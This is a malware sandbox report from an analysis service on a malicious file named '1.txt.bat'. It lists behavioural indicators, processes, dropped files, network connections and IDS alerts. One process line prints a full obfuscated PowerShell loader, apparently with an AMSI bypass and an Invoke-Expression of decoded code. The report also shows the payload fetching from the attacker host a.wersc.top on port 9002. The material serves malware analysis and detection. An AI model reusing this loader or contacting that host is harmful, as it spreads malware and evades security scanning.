File name:

1.txt.bat

Full analysis: https://app.any.run/tasks/d526ee8d-dff5-47c6-a89b-d5d36d1af856
Verdict: Malicious activity
Analysis date: June 05, 2025, 07:12:51
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

C30463CBC83A55B2F1D762DA1544B6F1

SHA1:

8E036E82F8FE4CB1F49D176B0455BE87EA10AE51

SHA256:

EC4D6E19F4961C4381694B6D90C84958FDCC0F1EC2A7DAAA9B66F9D34B71C655

SSDEEP:

3:VSJJFIGF14etwrWXLhzAK5DmfmARQVsVaEJMOM:s8GF1ZzD5CplVaEJK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2644)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 2644)

  • SUSPICIOUS

    • Application launched itself

      • powershell.exe (PID: 2644)

    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 2644)

    • Connects to unusual port

      • powershell.exe (PID: 2644)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 2644)

  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 2644)

    • Disables trace logs

      • powershell.exe (PID: 2644)

    • Reads the software policy settings

      • powershell.exe (PID: 6068)

    • Create files in a temporary directory

      • powershell.exe (PID: 6068)

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 6068)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6068)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
130
Monitored processes
6
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start powershell.exe conhost.exe no specs sppextcomobj.exe no specs slui.exe no specs svchost.exe powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2644"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Downloads\1.txt.bat.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5064"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
5304C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
6068"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -c IEX " &("{2}{1}{0}"-f 'M','E','Set-IT') vArIAble:s04IQ ([TyPE]("{0}{2}{1}{3}"-F'sY','Em.coNv','ST','ErT') ) ; .("{2}{0}{3}{1}"-f 'eT-v','LE','S','ariaB') ('T'+'AP') ( [tYPE]("{1}{0}" -f 'Ef','r')) ; &("{1}{2}{0}"-f 'M','S','eT-itE') ('vAriAbl'+'e:O'+'p7L') ( [type]("{0}{1}{3}{4}{2}" -F 'sySTe','m.tEXT.En','g','coD','In')) ;[Byte[]]${C} = ( &("{0}{1}" -f'dI','r') ('vaRI'+'ABL'+'E'+':'+'s04iQ') )."v`AlUe"::("{2}{0}{1}" -f 'romBas','e64String','F').Invoke(("{124}{122}{130}{125}{1}{56}{29}{97}{92}{106}{120}{59}{86}{61}{118}{11}{22}{14}{85}{127}{79}{100}{128}{54}{4}{13}{103}{94}{49}{137}{46}{51}{42}{35}{39}{17}{93}{43}{52}{90}{114}{9}{71}{44}{84}{74}{108}{110}{126}{131}{115}{62}{23}{102}{111}{30}{31}{65}{19}{69}{48}{47}{119}{98}{28}{81}{63}{32}{101}{34}{87}{6}{121}{73}{123}{113}{0}{129}{76}{105}{99}{112}{41}{18}{136}{58}{40}{57}{36}{20}{67}{133}{138}{55}{5}{37}{75}{45}{38}{50}{64}{95}{24}{104}{117}{89}{116}{109}{82}{53}{10}{3}{7}{141}{91}{139}{80}{134}{83}{77}{135}{107}{33}{25}{16}{8}{72}{66}{27}{15}{21}{70}{60}{96}{140}{68}{78}{88}{26}{142}{132}{12}{2}"-f 'Ep','bEklZFxranBKUhc0F1xkZWxpVmlYbRsAAQEgX2teZ','pa0oka1xK','IFxsaUs','VRjWF9qaVhEJW','A5XFtgPxcjXGRYRWNYYFpcZ0pLSR4faWZrWmxpa2plZjpcZWBdXDsla','aFA9RW1AaFtuUGZcKVwuWWMvWFApQj8vPkBtQWtNO21fK2BAZENoQ2xQR0ZsPGlnbDxsTW1AaWstPWZCZC1abU5bOEdtQGhFblBmXClGaV8tWnFDcFg8WygrZGwpQGFEcGhhYFhMTj06Qi5qY2Y9RW1AaTBJUGZGSFp','bFzQXcGlma1','YE4la11','BiSlFvYlk7Ym9NRVE8SWAsSEw+OWNbZytgSU9BJ0s9USdJOy9uTEJjPUk7YjlJRWcnSUQ5TEtkLG5NS1E8SDhBTkJsbl5LRDlMO1g9Y0lOQU1KRVAnSUQ5PDtEYm9MT1soSjtiSUw+','3BLUhdUICgXNBdlZmBrYGpmRx9pXGtcZFhpWEdSAAABI2ppXGtcZFhpWGdWaVhtGxdUVFJcZ3BLUhdU','WtHa2V','WmB','pcWmBtaVxKZ2','KmtlQExSFyNUKSprZUBMUhc','Rca2pwSh4fam','ZUwlKSpl','PU0sTWFZLThlOy1YKXFbbmhOWURRQmQpaGgpQGFEbkBZQk4iaG','0b','FphKEZj','kQGtcSiU','NYbGg8JVQoJFIgHlNTHh9rYGNnSiV','AUh9cYmZtZUAlWG1WaVhtGxc0F2lcXV1sWVZpWG0bAAEgICBUaWtHa2VAUh8XIFQp','WyZrTihRKGxePj9cPzhjL0UvbyJmQnFEcV5KJ','J','OFpmaUdrXD4eH1tmX2tcRGtcPiVqW2Zfa1xkVlxtYGtYZVZcXVhqZWxWaVhtGxc0F1hnXlZpWG0bAAEgHmpbZl9rXERcbWBrWEVcXVhq','G0bFyNcY2xbZmRWaVhtGx8XZF','2NbJW','a','IycXI1xbZlpWa','TklRYk1KYzw7WnFFKjlsL0BhQHBvQjtH','cGFEYEBtXEJDanEwWGFEYE','O','UUlxncEtSFyMeampcaVtb','GBnZVAuQU5cLSgqXGBrZVBxQ3BYaVw6aGBFbU','W1DOyJaYUQ6Q0RYcFguaypcJ','GRcY2d','VxbY2BsWV','yMeXGdwS1xrWF5cY1w7cEQeH1xncEtcZWBdXDslIFxqY1hdGxcjH','1koK2Q6bEBpSTpo','mVpbGtcaVZpWG0bFyMeY1hsa2lgTRcja2ZjSm5cRRcjXmBKcDlcW2A/FyNaYGNZbEceFyMeXGJmbWVAHh9bZl9rXERcZWBdXDslaVxbY2BsWVZcZ3BrVmlYbRsAASA','cZ3BLXGtYXGk6JWlcW2NgbFlWXGdwa1ZpWG','ouR','QGFEcFBYQilAYURxQFlCKUBhRXBAUWhsPGlRRyooPWZjSypnUGFAYCg9OG9pKD0qYC0oL','MWmcrYD1FRF','pgamU4FyNbXGNYXEoXI1pgY1lsRxcjampYYzoeF','2','vQ2','PWmhDX1lacUUqWkdGLGhjbWhpQWtoaW9PQkFFPytebE4saGxkMFphSTspX1pkYD1PWmVGTkBhakxaaENfWS5paFh','WSQXVG8b','lxjbFtmRHBpZmRcRGVAHh9cY','ZaVmlYbRsAAAFyFyAiIm8bFzJrZWxmOiVcW2ZaVmlYbRsXa2MkF28bFzInFzQXbxsfF2lmXQABASAeNEAsSjBlb0BLWl88RTw5PEVqbz1KJzg9S0A5Kl','ilpcF9GSz4qRypZRE0wXipbWWFpZComKGZnTjlBXF1wZ15tPE1fSC8mSWlLWj5KYmYrUUs9','BdcZ3BrVmVpbGtcaVZpWG0bF1RcZ','BmR2VmYGtaZWw9aWY9XGtYXlxjXDtrXD4xM','Sn','VxjJVxbZlpWaVhtGxcjaVxdXWxZVmlYbRsX','eW1xeWGVYRBcjXGRga2VsSR4fal5YYz1lZmBrWGtlX','5YYz1lZmBrWGtlXGRcY2dkQGtcSiUgamlca1xkWGlYZ1ZpWG0bFyNcZ3BrV','xrZ','cGNZZFxqajhj','sSSVkXGtqcEpSAAEgJytvJxcjJycnKm8nFyNfa','OFFaKEw+OTxIYEU6UWpwLiJIWzg+TTxJTW1OKzBBJzxI','woZ1hhYmJdWnFFKmpnWkRmbE5cLUEpXDtxW1pgRW5xXmx','2xbZkRaYGRYZXA7XGVgXVw7J','AiWEJDYVloM','yAeY','gamlca1xkWGlYZ1ZpWG0bFyNbaVhbZVhrSjExVGplZmBrZVxtZWY6XmVgY2NYOiVlZm','ZFxqajhrXD4lZWBYZGY7a2VcaWlsOjExVGVgWGR','K0hkYD1','lZmBrWFpmQyVWGxdbZTgkF1xfWlg6','PWNJPVF','mamZpWmBEHh9cZ3BLa1w+JSB0F','tYEMpOEc8cE86MG9hYUNvWGhDX1lnYz5jamopWklfLVg7PD9oaWtLWmZsKUhvXy1YPj1t','Sl9JSz4wOFopLEhLPkVIPj5JYkhO','ZcZ3BrVmlYbRsAASBUXGtYXlxjXDtralhaYGtjbEQlZFxranBKUhcjHmpqWGM6ZmtsOBcjampYYz','calg5ZGZpPTExVGtpXG1lZjolZFxranBKUhc0F1xbZlpWaVhtG1RUUlxrcDlSAAFyFyAvF2hcJBdc','VxkYGtlbEklZFxranBKF2taXGFZRiRuXEUfVF1cSVxjW2VYPyVqXFpgbWlcSmdm','mO2dnOFIfFzQXal','ZUBSHzcXXGdwa1Zca1heXGNcW1ZrXF5WWmVs','2NsZRsfXGJmbWVAJSAgHlxjW2VYP1xjbFtmRGtcPh4fW2Zfa1xEa1w+JWpbZl9rXGRWXG1ga1hlVlxdWGplbFZpW','S1ZPWloWChBKUBPUUxLQihiSk','AQEgAAFUW2BmTVIXN','lxaYG1pXEpnZmlca2VAJ','8/','jVCkqa2VATFIXI1Rpa0','UAlXGRga2V','BoMHFQZlwpWG1e','tmX2tcZFZcbWBrWGVWXF1YamVsVmlYbRsAAQAAIFxpbFtcWmZpZ1ZpW','qajhaYGRYZXA7XGVgXVw7JWVgWGRmO2tlXG','WmdoTG9HcEBnKzpLQDliSWJFXklAZydLO2ZuPEVAXz','gAAAR8XZFhpWEcAAXIXXGdwa','TFU','xkJ2hsPm9obD5abjkuWClxa29uWytcUUIp','JJWRca2pwSlIXNBdYbVZpWG0bAAEBdAABLCoXaWZv','SBlbEkxMVRqalxaWjhpXFtjYGw5cGNZZFxqajgla2BkPCVlZmBrWlxjXVxJ','WFlmYz4lVhsXchdrWlxhWUYkXGlcX04XcxcgH2pc','VhtGx9wZ2Y6M','tnP3ApcVssL2hCW1FCZFpgOUpKcEFkWmBnbDxsRXBAOGpuZGBBbGhpYz9MQFlHKjxoTVtRYmdQcUEpWmBnbDxsRWw8bD1tPGlnbDxpUUcqYkw4TW1jZ1BK','h8XXUABAXQBI','XR8XIyBaZmNjOGNYbGtpYE0XY2NbJSkqY1xlaVxiF2pqXGlbW1hWWmZpZ1ZrXF','X','kE4OjBALyhJMCpMRUpaT2FLQkVaWEc6TEEoSEtCLEw7Rmc','ZpXGtlQCVcZGBrZWx','WRca2pwSlIXIyAgHlxrWF5cY1w7W1xrWlxjXVxJHh9cZFh','cWBqMTFUaWtHa2VAU','Y1hfamlYRCVqXFpg','EklZFxranBKHh83F1R','SUxLOjBkO09FY0k4OWJQZytwPkVEXz9KX0k6RGJuO1gnbjxcQD0+RywnTkQ','aVxbY2BsWVZcZ3BrVmlYbRsA','nPE','nS0goSDxFOEk7SCte','B9','E','xRTE1MO15vPEVIOTtPKGJJP2dMTCpFOD5IJ0g9O1pPWTs4PU1EW0xLQkkqOjtESTtObl5IRz','HRShMOjBuS0ZbKEpEWihOPlso','lpbDoxMVRlYFhkZjtnZzhSFzQX','FcGNZZFxqajglZWZga1pcY11cSSVkXGtqcEoXa1pcYVlGJG5cRR8fcGNZZFx','15lXEMlXFtmWlZpWG0bFyNmaVxRMTFUa','9YYGktWC','bWlcSmdmaV','mbGRaYD1lcTlDbEBgLGA','Rpa0drZUBSH1xiZm1lQCVcZGVsaVZpWG0bAAEgICBUW2BmTVIfFyBUaWtHa2VAUh83F1xncGtWXGtYXlxjXFtWa1xeVlplbF0fFyNpXF1dbFlWaVhtGx9pXGtlYGZHZWZga1plbD','PGlNZVpvRWVQc','AXQBIGZpXFExMV','2ppWEQlalxaYG1pXEpnZmlca2VAJVxkYGtl','tCW2NIOGcnS0tFY0hHL2JLWV9uS0ZbKEpZb0hLRG','dr','5WWmVsXR8faVxrZW','QGFEcC1DRzBvXmwpKh4fXmVgaWtKKy1','1pZj1ca1heXGNcO2tcPjExVGNYX','cnTTo5Ykp','lZaZWxdF2VmYGtaZWxdAQEpF2VmYGppXE0kF1xbZkRr','BrW','G0bHxcjIGlrR2tlQBdrWlxhWUYkblxFHx9dXElcY1tlWD8la','aVxrZUAlXGRga2VsSSVkXGtqcEpSHzcXI2NjbGUbH1xiZm1lQCVYZ15WaVhtGxdlaWxrXGkAASAgHl5lYGlrah4XIx5dXElcY1tlWD8lalxaYG1pXEpnZmlca2VAJVxkYGtlb','F2VpbGtcaQABASAeW1xeWGVYRBcjXGRga2VsSR4fal','UlxbZlpWaVhtGxc0F1RvG1JcW','lxjXVxJJWRca2pwSlIXIx5aYGNZbEcXI15g','1Zca1heXGNcW1ZrXF5WWmVsXRdlZmBrWmVsXQEBdAEgIFxpbFtcWmZpZ1ZpWG0bFyMgICAgXGNsW2ZkVmlYbRsfNxcjY','YGNZ','hbZVhEFyMnFzQXZWZga2BqZkcfaVxrXGRYaVhHU','hpWEcAAXIXampcaVtbWFZaZmlnVmtcX')) [Byte[]]${d} = $s04iQ::("{2}{3}{4}{0}{1}" -f'n','g','F','romBase6','4Stri').Invoke(("{8}{4}{0}{1}{6}{9}{3}{12}{7}{5}{11}{2}{10}"-f 'a0','xgamQ','YRCVk','bD','mNg','ZFxeWG','4JWVmYG','Vc','a','tYZGZr','XGtqcEo=','V','gla2')) [Byte[]]${e} = ( &('gI') VArIabLE:s04iq )."vA`LUe"::("{2}{1}{3}{0}"-f'ing','ase6','FromB','4Str').Invoke(("{3}{2}{0}{1}"-f 'lQGB','qZFg=','B','W1xjYFg9a2')) function O (${V}){ [Byte[]]${T} = ${V}.("{1}{0}" -f 'one','cl').Invoke() for (${X} = 0; ${X} -lt ${v}."cOU`Nt"; ${X}++) { ${t}[${V}."cOU`Nt"-${x}-1] = ${v}[${x}] + 3 } return ${T} } ${Y} = 9 while(${Y} -gt 6){ ${c} = &('O')(${C}) ${D} = &('O')(${D}) ${E} = .('O')(${e}) ${Y} = ${Y} - 1 } (.("{1}{2}{0}" -f'LdITem','Ch','i') ('VARI'+'A'+'Bl'+'E:tAP'))."v`ALue"."A`SS`emBly".("{0}{2}{1}" -f'Ge','ype','tT').Invoke( $oP7L::"as`Cii"."gEt`stRing"(${d})).("{0}{1}{2}"-f'G','etFiel','d').Invoke( ( .("{0}{3}{1}{2}"-f'GeT','VAriaBl','e','-') ('oP7'+'L') -VAlUEOn )::"AS`Cii"."GetSTR`i`NG"(${E}),("{3}{1}{0}{2}"-f 'b','onPu','lic,Static','N')).("{1}{0}" -f 'alue','SetV').Invoke(${NU`ll},${tR`UE}) .("{1}{0}"-f 'x','ie')( ( &("{0}{1}{2}" -f'g','eT-','CHilDitEm') ('VariabL'+'E:o'+'P7l') )."vaL`Ue"::"As`cII"."G`EtS`TRiNg"(${c})) "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
7388\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
9 259
Read events
9 259
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
6068powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bew1eb3q.uuq.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2644powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uuse0q0y.htz.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2644powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dcvbgtml.vrf.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2644powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:2AC09C22ED37177DA0C1FDD3CF2C3F4E
SHA256:8913E71126B4AFA5393ECF13DE627FA70DD84637E425D34AEA11DF6A8FCEB8F5
2644powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KLKOQSJIU98PQIWZ71XW.tempbinary
MD5:2AC09C22ED37177DA0C1FDD3CF2C3F4E
SHA256:8913E71126B4AFA5393ECF13DE627FA70DD84637E425D34AEA11DF6A8FCEB8F5
2644powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF11f903.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
6068powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xegqcik0.crf.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6068powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:4D6DBC50A803A6BD19D6E594779FF6FB
SHA256:1BC2547C1B26E7B99A1AC2BF855AB737325687AC83913EE5D671FC7961B29BD4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
20
DNS requests
14
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
2.16.168.124:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2644
powershell.exe
GET
200
143.92.49.145:9002
http://a.wersc.top:9002/aliv
unknown
unknown
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
3304
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
3304
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5024
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
2.16.168.124:80
crl.microsoft.com
Akamai International B.V.
RU
unknown
5496
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
7600
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2644
powershell.exe
143.92.49.145:9002
a.wersc.top
BGPNET Global ASN
HK
unknown
6544
svchost.exe
40.126.31.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 2.16.168.124
  • 2.16.168.114
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
google.com
  • 142.250.185.110
whitelisted
a.wersc.top
  • 143.92.49.145
  • 143.92.49.148
unknown
login.live.com
  • 40.126.31.71
  • 20.190.159.68
  • 20.190.159.130
  • 20.190.159.4
  • 40.126.31.73
  • 20.190.159.131
  • 40.126.31.129
  • 40.126.31.0
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
2644
powershell.exe
Potentially Bad Traffic
ET HUNTING Request to .TOP Domain with Minimal Headers
2644
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
1.txt.bat